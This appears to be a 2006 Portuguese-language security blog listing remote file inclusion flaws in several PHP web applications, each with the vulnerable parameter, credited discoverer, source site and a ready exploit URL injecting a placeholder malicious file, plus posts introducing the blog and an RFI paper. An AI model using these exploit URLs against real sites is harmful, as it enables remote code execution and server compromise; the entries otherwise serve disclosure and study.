terça-feira, outubro 03, 2006

phpMyProfiler 0.96 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $pmp_rel_path do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: phpMyProfiler 0.96 e inferiores
Download: sourceforge.net
Código vulnerável (functions.php):
indisponível
Desoberta por: mozi
Exploit:
http://host/functions.php?pmp_rel_path=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

JAF CMS 4.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $website= do arquivo forum.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: JAF CMS 4.0
Download: sourceforge.net
Código vulnerável (forum.php):
indisponível
Desoberta por: Kacper (a.k.a Rahim)
Exploit:
http://host/module/forum/forum.php?fd=hack&website=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

segunda-feira, outubro 02, 2006

Deluxe BB - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $templatefolder do arquivo Sig.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: DeluxeBB
Download: deluxebb.com
Código vulnerável (functions.php):
indisponível
Desoberta por: r0ut3r
Exploit:
http://host/templates/deluxe/cp/sig.php?settings[smilies]=on&templat
efolder=arquivomaligno?%00
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: securityfocus.com

PHP Web Scripts Easy Banner - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $s[phppath]= do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: PHP Web Scripts Easy Banner
Download: phpwebscripts.com
Código vulnerável (functions.php):
indisponível
Desoberta por: abu ahmed
Exploit:
http://host/functions.php?s[phppath]=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: securityfocus.com

BBaCE 3.5 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $phpbb_root_path= do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: BBaCE 3.5 e anteriores
Download: bbace.blogspot.com
Código vulnerável (functions.php):
indisponível
Desoberta por: SpiderZ
Exploit:
http://host/includes/functions.php?phpbb_root_path=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

sábado, setembro 30, 2006

VAMP Webmail 2.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $no_url do arquivo /setup/yesno.phtml permitem a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: VAMP Webmail 2.0 e anteriores
Download: não disponível
Código vulnerável (/setup/yesno.phtml):
include $yes_url;
} else {
include $no_url;
}?>
Desoberta por: Drago84
Exploit:
http://host/setup/yesno.phtml?no_url=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

phpMyWebmin 1.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $target dos arquivos change_preferences2.php, create_file.php, upload_local.php e upload_multi.php permitem a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: phpMyWebmin 1.0 e anteriores
Download: josh.ch
Código vulnerável (nos arquivos citados):
include("$target/$folder/preferences.php");
Desoberta por: XORON
Exploit:
http://host/change_preferences2.php?target=arquivomaligno?
http://host/create_file.php?target=arquivomaligno?
http://host/upload_local.php?target=arquivomaligno?
http://host/upload_multi.php?target=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

quinta-feira, setembro 28, 2006

[Paper] Inclusão de Arquivo Remoto no PHP

Novo paper no .hack-attack. O texto trata da vulnerabilidade na inclusão de arquivo remoto mal verificado do PHP, mais popularmente conhecido como PHP Injection. A leitura é interessante pra quem gosta de entender uma falha, e não somente explorar ela de forma decorada (como muita gente faz com o PHP Injection).

Interessados em baixar podem visitar nossa seção de papers ou baixar o arquivo diretamente por aqui.

stay root,
loading...

quarta-feira, setembro 27, 2006

Hello World!

Hack-Attack. Vulnerabilidades divulgadas e explicadas todos os dias. E o melhor de tudo, em português.

Referência (essa lista poderá ser ampliada):
milw0rm.com
securityfocus.com

stay root,
loading...